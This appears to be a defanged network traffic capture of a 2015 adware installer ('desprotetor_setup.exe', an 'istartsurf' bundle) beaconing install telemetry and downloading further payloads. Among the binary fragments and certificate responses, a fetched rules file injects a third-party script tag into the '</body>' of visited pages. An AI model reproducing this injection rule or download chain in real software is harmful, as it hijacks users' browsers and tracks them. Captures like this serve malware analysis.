HEAD /desprotetor_setup.exe HTTP/1.1

Accept: */*

Host: VVV.1strequest.me

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Content-Length: 0

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx/1.0.15

Date: Thu, 30 Apr 2015 23:07:44 GMT

Content-Type: application/octet-stream

Content-Length: 1117309

Last-Modified: Thu, 30 Apr 2015 03:46:04 GMT

Connection: keep-alive

Access-Control-Allow-Origin: *

Access-Control-Allow-Headers: X-Requested-With

CC: UA

Accept-Ranges: bytes

HTTP/1.1 200 OK..Server: nginx/1.0.15..Date: Thu, 30 Apr 2015 23:07:44 GMT..Content-Type: application/octet-stream..Content-Length: 1117309..Last-Modified: Thu, 30 Apr 2015 03:46:04 GMT..Connection: keep-alive..Access-Control-Allow-Origin: *..Access-Control-Allow-Headers: X-Requested-With..CC: UA..Accept-Ranges: bytes......

GET /desprotetor_setup.exe HTTP/1.1

Range: bytes=0-1117308

Accept: */*

Host: VVV.1strequest.me

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Server: nginx/1.0.15

Date: Thu, 30 Apr 2015 23:07:44 GMT

Content-Type: application/octet-stream

Content-Length: 1117309

Last-Modified: Thu, 30 Apr 2015 03:46:04 GMT

Connection: keep-alive

Access-Control-Allow-Origin: *

Access-Control-Allow-Headers: X-Requested-With

CC: UA

Content-Range: bytes 0-1117308/1117309

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................................................................s..........H............................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc...H............v..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..

<<< skipped >>>

GET /v4/searchprotect/535559167_198339_B48A115F?action0=xa.geoip&action1=visit&action2=install HTTP/1.1

Connection: Keep-Alive

User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.

Host: xa.xingcloud.com

HTTP/1.1 200 OK

Server: nginx/1.6.2

Date: Thu, 30 Apr 2015 23:07:40 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.3.3

xa-api-version: v4

48..{"stats":"ok","time":"1.95 ms","message":"store 4 action and 0 update "}..0..HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 30 Apr 2015 23:07:40 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api-version: v4..48..{"stats":"ok","time":"1.95 ms","message":"store 4 action and 0 update "}..0..

GET / HTTP/1.1

Host: VVV.google.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: keep-alive

HTTP/1.1 302 Found

Cache-Control: private

Content-Type: text/html; charset=UTF-8

Location: hXXp://VVV.google.com.ua/?gfe_rd=cr&ei=qLVCVZ3BLteDNJmBgQg

Content-Length: 259

Date: Thu, 30 Apr 2015 23:07:20 GMT

Server: GFE/2.0

Alternate-Protocol: 80:quic,p=1

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">.<TITLE>302 Moved</TITLE></HEAD><BODY>.<H1>302 Moved</H1>.The document has moved.<A HREF="hXXp://VVV.google.com.ua/?gfe_rd=cr&ei=qLVCVZ3BLteDNJmBgQg">here</A>...</BODY></HTML>..HTTP/1.1 302 Found..Cache-Control: private..Content-Type: text/html; charset=UTF-8..Location: hXXp://VVV.google.com.ua/?gfe_rd=cr&ei=qLVCVZ3BLteDNJmBgQg..Content-Length: 259..Date: Thu, 30 Apr 2015 23:07:20 GMT..Server: GFE/2.0..Alternate-Protocol: 80:quic,p=1..<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">.<TITLE>302 Moved</TITLE></HEAD><BODY>.<H1>302 Moved</H1>.The document has moved.<A HREF="hXXp://VVV.google.com.ua/?gfe_rd=cr&ei=qLVCVZ3BLteDNJmBgQg">here</A>...</BODY></HTML>....

GET /gscodesigng2/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRruLd2WRFk6cRYGFIqkQ4J8hxDogQUCG7YtpyKv+0+18N0XcyAH6gvUHoCEhEhhrE10BUs2OqNBLZ9KgzPNA== HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp2.globalsign.com

HTTP/1.1 200 OK

Date: Thu, 30 Apr 2015 23:11:57 GMT

Content-Type: application/ocsp-response

Content-Length: 1474

Connection: keep-alive

Set-Cookie: __cfduid=d627dcfacd8ecab9edfc9af1368c6b67f1430435517; expires=Fri, 29-Apr-16 23:11:57 GMT; path=/; domain=.globalsign.com; HttpOnly

X-Powered-By: Servlet/3.0; JBossAS-6

ETag: 91499122d126a896a1d8c34863d5e7acd6de4b53

Expires: Fri, 01 May 2015 04:15:35 GMT

Last-Modified: Thu, 30 Apr 2015 16:15:35 GMT

Cache-Control: max-age=180, public, no-transform, must-revalidate

CF-Cache-Status: HIT

Server: cloudflare-nginx

CF-RAY: 1df6edc0de2e046d-FRA

0..........0..... .....0......0...0......,p... ...Gy.....'..B..20150430161535Z0u0s0K0... ........k..vY.d..X.R*.....C....n......>..t]..../Pz...!..5..,.....}*..4....20150430161535Z....20150501041535Z0...*.H...........`y._{V.....x%..v.t.w..[|....T..D>.2...)."..j.7...qpM..&V....4....,K..B.3.....!..v <#....F.J...j(@..o..6.e,...\..?7.......n..~...R...6.../"../&~F...4N4e..y<.<7.yu...{......r~...&....D....B..VW.t4....-.........JI.a.FD...8..A\..li.....^......l.3;..v$n..l.E.M.....0...0...0...........!~.(......gxK.2.T0...*.H........0Q1.0...U....BE1.0...U....GlobalSign nv-sa1'0%..U....GlobalSign CodeSigning CA - G20...150303092326Z..150603082326Z0}1.0...U....BE1.0...U....GlobalSign nv-sa1:08..U...1GlobalSign CodeSigning CA - G2 OCSP responder - 11.0...U....201503031023000.."0...*.H.............0..............E..%p...1.._N.DD..y:\Q...........\.2!PFr...=.C-..dYY........e....yAy...U.HZ3.O....w&Z.:.>.[......>.(..l..t.g3@X&..*i......i.u{...C.....B...........gj......s.!..~..].mS.#.,A @.......b...i.*G....2l.u.....<ISC....F......}0....w2W..KC......6_.........Wua........0..0...U....0.0...U...........0...U.%..0... .......0... .....0......0...U......,p... ...Gy.....'..B0...U.#..0....n......>..t]..../Pz0...*.H.............y..6.-....H.~...H.....L..:G.....p...C..:.... /...5M.^}...5Q.~.....VC...Y.Z(I.k....P. s.!..b..,.A........~..y.G.H....N._......J.........|.k4..../...........('.....)..:..t....-..}e&.*..:*8IH|2s::r..63..Y..G.....#.- ........N....R..X..@. j.,.........N.h........

<<< skipped >>>

GET /v4/sof-installer/535559167_198339_B48A115F?action1=xa.geoip&action2=visit&action3=pcm.visit.istartsurf&update1=ref,pcm&update2=identifier,installer&update3=version,6.3.7602.2008&update4=nation,us&update5=language,en HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: xa.xingcloud.com

Connection: Keep-Alive

GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.dlzip1.istartsurf.finish,5 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: xa.xingcloud.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/0.7.67

Date: Thu, 30 Apr 2015 23:07:15 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.3.3

xa-api-version: v4

Content-Encoding: gzip

57.............V*.I,)V.R..V.Q*..M.....L.r......... .....T.C......<............T..Z.....H.....0..HTTP/1.1 200 OK..Server: nginx/0.7.67..Date: Thu, 30 Apr 2015 23:07:15 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api-version: v4..Content-Encoding: gzip..57.............V*.I,)V.R..V.Q*..M.....L.r......... .....T.C......<............T..Z.....H.....0..

GET /pub/firefox/releases/34.0.5/update/win32/en-US/firefox-34.0.5.complete.mar HTTP/1.1

Host: download.cdn.mozilla.net

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Range: bytes=900000-1199999

Connection: keep-alive

HTTP/1.1 206 Partial Content

Last-Modified: Wed, 26 Nov 2014 16:59:55 GMT

ETag: "4b1e700-2dc5623-508c5f506dac8"

Server: Apache

X-Backend-Server: ftp3.dmz.scl3.mozilla.com

Content-Type: application/octet-stream

Accept-Ranges: bytes

Access-Control-Allow-Origin: *

X-Cache-Info: cached

Cache-Control: max-age=255584

Expires: Sun, 03 May 2015 22:07:04 GMT

Date: Thu, 30 Apr 2015 23:07:20 GMT

Content-Range: bytes 900000-1199999/47994403

Content-Length: 300000

Connection: keep-alive

d,.f.\s..H.vB9..b.I`.b..8%..g..m....x..*.....{....?..u;f....._nU._......y q....].~..N...=....c.:..wuz. g...O?....*-..U..,..]u.iE...9..s.gN..5.A.v....;BK..H.....>.J..T.n.#. .......^:...9.giR..h.s..dX[:..D..3...I.`.5..pb.s.-..........P...M.3.,.Z.....t.&Z$nJ."o'.\..O.h.B,Y.......W.........!<.eu.BWsJ.=...Z.l....~..l'...l..9l|....d.x....Fw.B.Gv8....2.XJ.Ed..r...V.J.%.$.~^..N..b.....!..w h-..3.......C[m......R.*/.@.mJg..L.......t.#A....X......D.B.....w.d...$6....8.I....GP..e...o\.UJ.u..yX.I....c..<KG..T......L..mT..,7rA..g..".?....../.&...dI......&.. .k..p.....s..J\..J..p....!.1(...U...A=.......D.....{.H.....v..5!..w.......&.s|......=...V...Ig..Dp..@k..*...o".......Q..r..l]u.u/...(.i......(..j........1.g7..f._N..eVm..~...)%.hX0Zm............z.w...R.".^.hI.Q..nZ@..|....@l4....z...f..ll..._.....(!$....gR..;O.$$#...w.{.k.hB.4.?.....u.$...&}.......Od.. ....".......;[.7@.......n....h$.n.[...B?n......$.\%2........!S...l.(.k...:......c...h.f/...x..VZ..A..R*~....dHh.....9...I.m IW..a1.$u8..o..@........h<...i.v./-.\-......d..~h..H. ..6.M..0....Z.A.T....N..K @....j%....U:.^..z...~.I.....F"..J...`.......1F$...s.D......x$O6....;r.P./.es4.*......n.{g._.U..R?(......|.....B.......m.N....p&.Z......*..ZQ..VR..[..8@".1xy.P..........z.n^.<....^...n3...1...'Ki../...n.A.........cs...0n@Zh.W....B..<.M$..2..|.v.n/6...V........lE/......w8-........-R..\e...WA...756.H.]/d.....-......'......... ..4J@.<.S.4....Fu6%...du.iP.....*>........%/..>#..}....._...c.b.f..!...D%L...../.......,...o&u...#..1...Ex.k.P.. .S.J/......

<<< skipped >>>

GET /services/rules.txt?dummy=100 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: VVV.brsoftwarellc.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.6.2

Date: Thu, 30 Apr 2015 23:07:37 GMT

Content-Type: text/plain

Content-Length: 111

Connection: keep-alive

Last-Modified: Thu, 30 Apr 2015 22:05:56 GMT

ETag: "5ac277-6f-514f84cc55900"

Cache-Control: max-age=600

Expires: Thu, 30 Apr 2015 23:17:37 GMT

P3P: CP="Potato"

X-Cache: MISS

X-Server: Provided by Intermedia

X-Country: UA

Access-Control-Allow-Origin: *

Access-Control-Allow-Headers: X-Requested-With

Access-Control-Allow-Credentials: true

Accept-Ranges: bytes

</body>|<script src="//queryjs.me/services/script.js" type="text/javascript"></script></body>.ncupons|nncupons.HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 30 Apr 2015 23:07:37 GMT..Content-Type: text/plain..Content-Length: 111..Connection: keep-alive..Last-Modified: Thu, 30 Apr 2015 22:05:56 GMT..ETag: "5ac277-6f-514f84cc55900"..Cache-Control: max-age=600..Expires: Thu, 30 Apr 2015 23:17:37 GMT..P3P: CP="Potato"..X-Cache: MISS..X-Server: Provided by Intermedia..X-Country: UA..Access-Control-Allow-Origin: *..Access-Control-Allow-Headers: X-Requested-With..Access-Control-Allow-Credentials: true..Accept-Ranges: bytes..</body>|<script src="//queryjs.me/services/script.js" type="text/javascript"></script></body>.ncupons|nncupons...

GET /?product=firefox-34.0.5-complete&os=win&lang=en-US HTTP/1.1

Host: download.mozilla.org

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Range: bytes=900000-1199999

Cookie: optimizelySegments={"245617832":"none","245875585":"direct","245677587":"ff","246048108":"false","869421433":"true"}; optimizelyEndUserId=oeu1401956287616r0.2603029596469415; optimizelyBuckets={}; __utma=150903082.1617578787.1401956289.1401956289.1401956289.1

Connection: keep-alive

HTTP/1.1 302 Found

Server: Apache

X-Backend-Server: bouncer2.webapp.scl3.mozilla.com

Cache-Control: max-age=60

Content-Type: text/html; charset=UTF-8

Date: Thu, 30 Apr 2015 23:07:15 GMT

Location: hXXp://download.cdn.mozilla.net/pub/firefox/releases/34.0.5/update/win32/en-US/firefox-34.0.5.complete.mar

Keep-Alive: timeout=3, max=499

Content-Length: 0

Connection: Keep-Alive

X-Cache-Info: cached

HTTP/1.1 302 Found..Server: Apache..X-Backend-Server: bouncer2.webapp.scl3.mozilla.com..Cache-Control: max-age=60..Content-Type: text/html; charset=UTF-8..Date: Thu, 30 Apr 2015 23:07:15 GMT..Location: hXXp://download.cdn.mozilla.net/pub/firefox/releases/34.0.5/update/win32/en-US/firefox-34.0.5.complete.mar..Keep-Alive: timeout=3, max=499..Content-Length: 0..Connection: Keep-Alive..X-Cache-Info: cached..

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTSqZMG5M8TA9rdzkbCnNwuMAd5VgQUz5mp6nsm9EvJjo/X8AUm7+PSp50CEGO+CyDUoFQBjrKVo87pCRc= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.verisign.com

HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1725

content-transfer-encoding: binary

Cache-Control: max-age=563288, public, no-transform, must-revalidate

Last-Modified: Thu, 30 Apr 2015 11:40:21 GMT

Expires: Thu, 7 May 2015 11:40:21 GMT

Date: Thu, 30 Apr 2015 23:12:13 GMT

Connection: keep-alive

0..........0..... .....0......0...0......N$p...v....1.;..vn....20150430114021Z0s0q0I0... ...................F....0.yV......{&.K......&.......c.. ..T.............20150430114021Z....20150507114021Z0...*.H.............>6K&Pfq...g.MF....Kp..>.-.3............Cpa.X...\...........2..W.c=k6m>.z....SB.$[s..|#...;vO.6......'$.k.0...H.4.`...M....Iq...&...1....i..!..'.A4.l.H..... ...".p.r%'.r........,...Sa.b.0cx.Oh.7..Q.......Uu.(^...q.9......bh...Q.".y..MO..1 ....s......\....P.....0...0...0............F...I]A(M..s@.0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,..U...%VeriSign Class 3 Code Signing 2010 CA0...150225000000Z..150526235959Z0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1VeriSign Class 3 Code Signing 2010 OCSP Responder0.."0...*.H.............0.........q<...A...#......A...u..Lz.............o..D.vQ%..s.......f....e../jI.d.W.....|K;.j5...#.B%.]..~S.... .|;S.&.....N..`...5.....!D.p....M/.. ..;j...q..`6...2.Ck..BnLHvCZn%....,.w.Ooi..z'...\.Yx......b..L...5.o..o..{..}.........%e.....N..._i........*Bc....:yQg.........0...0...U....0.0....U. ...0..0....`.H...E....0..0(.. .........hXXps://VVV.verisign.com/CPS0b.. .......0V0...VeriSign, Inc.0.....=VeriSign's CPS incorp. by reference liab. ltd. (c)97 VeriSign0...U.%..0... .......0...U........0... .....0......0"..U....0...0.1.0...U....TGV-B-31830...*.H..............-..^.........f.P`...s.....8.....V.......... .... B.(@-

<<< skipped >>>

GET /install.gif?bundle=istartsurf&ptid=pcm&uid=535559167_198339_B48A115F HTTP/1.1

Connection: Keep-Alive

User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926

Host: log.very911.com

HTTP/1.1 404 Not Found

Server: Tengine/1.2.2

Date: Thu, 30 Apr 2015 23:07:19 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 668

Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">..<html>..<head><title>404 Not Found</title></head>..<body bgcolor="white">..<h1>404 Not Found</h1>..<p>The requested URL was not found on this server. Sorry for the inconvenience.<br/>..Please report this message and include the following information to us.<br/>..Thank you very much!</p>..<table>..<tr>..<td>URL:</td>..<td>hXXp://log.very911.com:8080/install.gif?bundle=istartsurf&ptid=pcm&uid=535559167_198339_B48A115F</td>..</tr>..<tr>..<td>Server:</td>..<td>us-pub00.v9.com</td>..</tr>..<tr>..<td>Date:</td>..<td>2015/04/30 18:07:19</td>..</tr>..</table>..<hr/>Powered by Tengine/1.2.2..</body>..</html>..HTTP/1.1 404 Not Found..Server: Tengine/1.2.2..Date: Thu, 30 Apr 2015 23:07:19 GMT..Content-Type: text/html; charset=utf-8..Content-Length: 668..Connection: keep-alive..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">..<html>..<head><title>404 Not Found</title></head>..<body bgcolor="white">..<h1>404 Not Found</h1>..<p>The requested URL was not found on this server. Sorry for the inconvenience.<br/>..Please report this message and include the following information to us.<br/>..Thank you very much!</p>..<table>..<tr>..<td>URL:</td>..<td>

<<< skipped >>>

GET /services/rules.txt?dummy=779 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: VVV.brsoftwarellc.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.6.2

Date: Thu, 30 Apr 2015 23:07:21 GMT

Content-Type: text/plain

Content-Length: 111

Connection: keep-alive

Last-Modified: Thu, 30 Apr 2015 22:05:56 GMT

ETag: "5ac277-6f-514f84cc55900"

Cache-Control: max-age=600

Expires: Thu, 30 Apr 2015 23:17:21 GMT

P3P: CP="Potato"

X-Cache: MISS

X-Server: Provided by Intermedia

X-Country: UA

Access-Control-Allow-Origin: *

Access-Control-Allow-Headers: X-Requested-With

Access-Control-Allow-Credentials: true

Accept-Ranges: bytes

</body>|<script src="//queryjs.me/services/script.js" type="text/javascript"></script></body>.ncupons|nncupons.t>....

GET /services/update.php?v=1.0.0&key=XjbAXMdlReRSpd1DDxs3QmrHlGV9Q488&dummy=268 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: VVV.brsoftwarellc.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.6.2

Date: Thu, 30 Apr 2015 23:07:22 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

P3P: CP="Potato"

X-Cache: BYPASS

X-Server: Provided by Intermedia

X-Country: UA

Access-Control-Allow-Origin: *

Access-Control-Allow-Headers: X-Requested-With

Access-Control-Allow-Credentials: true

HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 30 Apr 2015 23:07:22 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..P3P: CP="Potato"..X-Cache: BYPASS..X-Server: Provided by Intermedia..X-Country: UA..Access-Control-Allow-Origin: *..Access-Control-Allow-Headers: X-Requested-With..Access-Control-Allow-Credentials: true..

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEAKQll6RM0DNpmNM7zH3/Qc= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.verisign.com

HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1790

content-transfer-encoding: binary

Cache-Control: max-age=479015, public, no-transform, must-revalidate

Last-Modified: Wed, 29 Apr 2015 12:15:02 GMT

Expires: Wed, 6 May 2015 12:15:02 GMT

Date: Thu, 30 Apr 2015 23:12:34 GMT

Connection: keep-alive

0..........0..... .....0......0...0......'.V.8.F.V....H....JW..20150429121502Z0s0q0I0... ..........!7h....O.d...AG&h.....k.&p..?...-.5..........^.3@..cL.1.......20150429121502Z....20150506121502Z0...*.H...............d...W.P".....!..%.p..0....e."..<.\l&.. zl%ln@{.Sc.....l....;R....@).(E.D...c.\.Q.L&...;]A$:.o1.(>.l..G#Db.!....bO..T=&}?.`.....w.}1[.1.P.{[.%..Lji..`H...............Z...9M\\du8.X.N..c.A.:j$.p.2...0.....7.2x....C"."...1(.LA6...&....SH,..../....fm...5@.-.....#0...0...0..........r..?.*......y"..0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use at hXXps://VVV.verisign.com/rpa (c)09100...U...'VeriSign Class 3 Code Signing 2009-2 CA0...150226000000Z..150527235959Z0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use at hXXps://VVV.verisign.com/rpa (c)091<0:..U...3VeriSign Class 3 Code Signing 2009-2 OCSP Responder0.."0...*.H.............0.............m5*R........2....>...yU4..L.. ...........u..Hez..Pn.....d...nz(...V7.}^...d!RX...bl..[..a...L.. .~..Ij......%..%p.-...u..:..i..F*]...*....{NH..|0...gHX.Q.r....S..........._.9.(w...suC...N..s.....&."...:.C.Q.i~rl..<..krS..8.B..o].y..L.4...iB@..s.....mw.........0...0...U....0.0....U. ...0..0....`.H...E....0..0(.. .........hXXps://VVV.verisign.com/CPS0b.. .......0V0...VeriSign, Inc.0.....=VeriSign's CPS incorp. by reference liab. ltd. (c)97 VeriSign0...U.%..0... .......0...U........0... .....0......0"..U....0...0.1.0...U....TGV-B-32010...*.H

<<< skipped >>>

GET /3517/1 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: VVV.ejpkwz.cc

Connection: Keep-Alive

GET /files/zip_r3/3517_285376eeff6d14f058406e7986125234/1.zip HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: VVV.ejpkwz.cc

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 01 May 2015 01:05:22 GMT

Content-Type: application/zip

Content-Length: 2211012

Last-Modified: Tue, 28 Apr 2015 10:21:26 GMT

Connection: keep-alive

Accept-Ranges: bytes

PK........}*.F.}&A............479.jsonS...=Uu......u~. .......6~..&.z..e......s....^s&<..O....E...=...kgs..m.2..j.%.P.g..._...S>...C^.........Y...$.L..`..UtZ.... wm..L:...0>....:=.]..... \.^\9Y8yka`.k.m.f.96..a..f.k.&...%.........?..Q.....w4....k;q....c.V......<.jOn..`Y.qm..]..........yq.#D.D.l..C..u{'.8.....T7]zI..{.......WQ.*z|....e..l..v.....c..:g....'..b.q~..wH.=U~.Y.{.....7.N....T.s.4.L..s..6q..f_...nY...../.l?=-i...y.m~E.../.u.MQ ...S~......^....i.G{.........2...y..........-.ya...ss.."....s~...........'.p..".....G.....-#..G~....q..PK........}*.F.........<......uninstallDlg2.xml.[m..6..~@..........v.b.....4..Z..".%.fW&U......7.(Y...\s.].v.X.4.....3b..._%....r6...m!.".S..Z...gl.Lb...32..Hf..^.....)........O..;q-..T.....z6.......s.p1.>.........|....1..Y......%; t..xjI...Q...M.9N2.<;@.~.p....\..A....\..u.....Q%...u..e.... ..'9\........\~.. .!I......v....x.t_D.$Bw0.V.......4..8...Es....0L..lF..ET..8... p.k-x..qR.....~Kn.gK..'.d....%;...%GK..B.k.[.w....H.$y.Em.R...:Y.....l.v#..(.d.....ntgA....4.j.{m.W.3V.=.O(.c....P.WT:X.?2.E.....>..k...=......7b~.]..`.....(.............2_.L......:@...F...M......1..".9X.....c.!3H%...d...41E2./H...p....R.3........1`.......@....W.......2.....e..1n.,.-C..2..)f....M.@...N...<....r9..../.],!.*...M9..cO.h..c..Fr..`......3....<..Q....V.*.~.....5....S...I..nj..Q.A.. .....bn.2!.9$ .....U%.....p....v.-*.. *C7{...F......4wj..2...2.k....tU'63....r.m.~............a.S....W..V ...z..u.~.s...gg...Z\q..'F.8..Rm..V.kT.. E^X)j..QU*>y..\.j.....$...x.=.....kI.-..p

<<< skipped >>>

GET /gscodesignsha2g2/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQpEOCqbmTiQA9OjY//t2aa8NSkuwQUGUq4WuRNMaUU5V7sL6Mc+oCMMmsCEhEhJz1lhSyxS2RYZQVJ48M2bQ== HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp2.globalsign.com

HTTP/1.1 200 OK

Date: Thu, 30 Apr 2015 23:11:57 GMT

Content-Type: application/ocsp-response

Content-Length: 1493

Connection: keep-alive

Set-Cookie: __cfduid=d9475cef6091554b34cfafc407203a1381430435517; expires=Fri, 29-Apr-16 23:11:57 GMT; path=/; domain=.globalsign.com; HttpOnly

X-Powered-By: Servlet/3.0; JBossAS-6

ETag: 8fc8d7ab1aa7313fa97fcb4c95a3d6ccbfe23096

Expires: Thu, 30 Apr 2015 23:19:16 GMT

Last-Modified: Thu, 30 Apr 2015 11:19:16 GMT

Cache-Control: max-age=180, public, no-transform, must-revalidate

CF-Cache-Status: HIT

Server: cloudflare-nginx

CF-RAY: 1df6edbd501301b1-FRA

0..........0..... .....0......0...0.......0?.....!...>., ......20150430111916Z0u0s0K0... ........)...nd.@.N....f........J.Z.M1...^./.....2k...!'=e.,.KdXe.I..6m....20150430111916Z....20150430231916Z0...*.H............ m.......#%F...x...hbV..x.MD.<.F....k.U..v......C]......>1..Iq.3...[Kp>.. .......S.M.Da.. .3]f~/.*.o.9...h.G...r~..B.*.,...{..wx...)..4.....@....G.....!>..t...;.7...m}...|_..).->2......$..o.?.&*.2.....}.&B...h...o.@SK.........G..j<h...L...}....o.......sea....0...0...0...........!.}.*./..(.....C.0...*.H........0Z1.0...U....BE1.0...U....GlobalSign nv-sa100...U...'GlobalSign CodeSigning CA - SHA256 - G20...150318093923Z..150618083923Z0..1.0...U....BE1.0...U....GlobalSign nv-sa1C0A..U...:GlobalSign CodeSigning CA - SHA256 - G2 OCSP responder - 21.0...U....201503181039000.."0...*.H.............0..........]W0..;Cq..t....H.mQ...C.PN...0...Z.p`xT`...g...^c.`....&S..<.w.......o&..,...n=.{i`\....Fhn.....i%.b,.IS... .]...Vh...~._i.Y......sF%...I..V.I]Kn.x.....h........)...5..F.6m0;....l..B..d-.ha...>T._.o.7...."..e....~5a...=..9.h'F>.X...k.l....gCC'S.....@............0..0...U....0.0...U...........0...U.%..0... .......0... .....0......0...U.......0?.....!...>., ....0...U.#..0....J.Z.M1...^./.....2k0...*.H.................&..Y.7).!......9s..~.N..4..uz.t.K2Y..=. ... 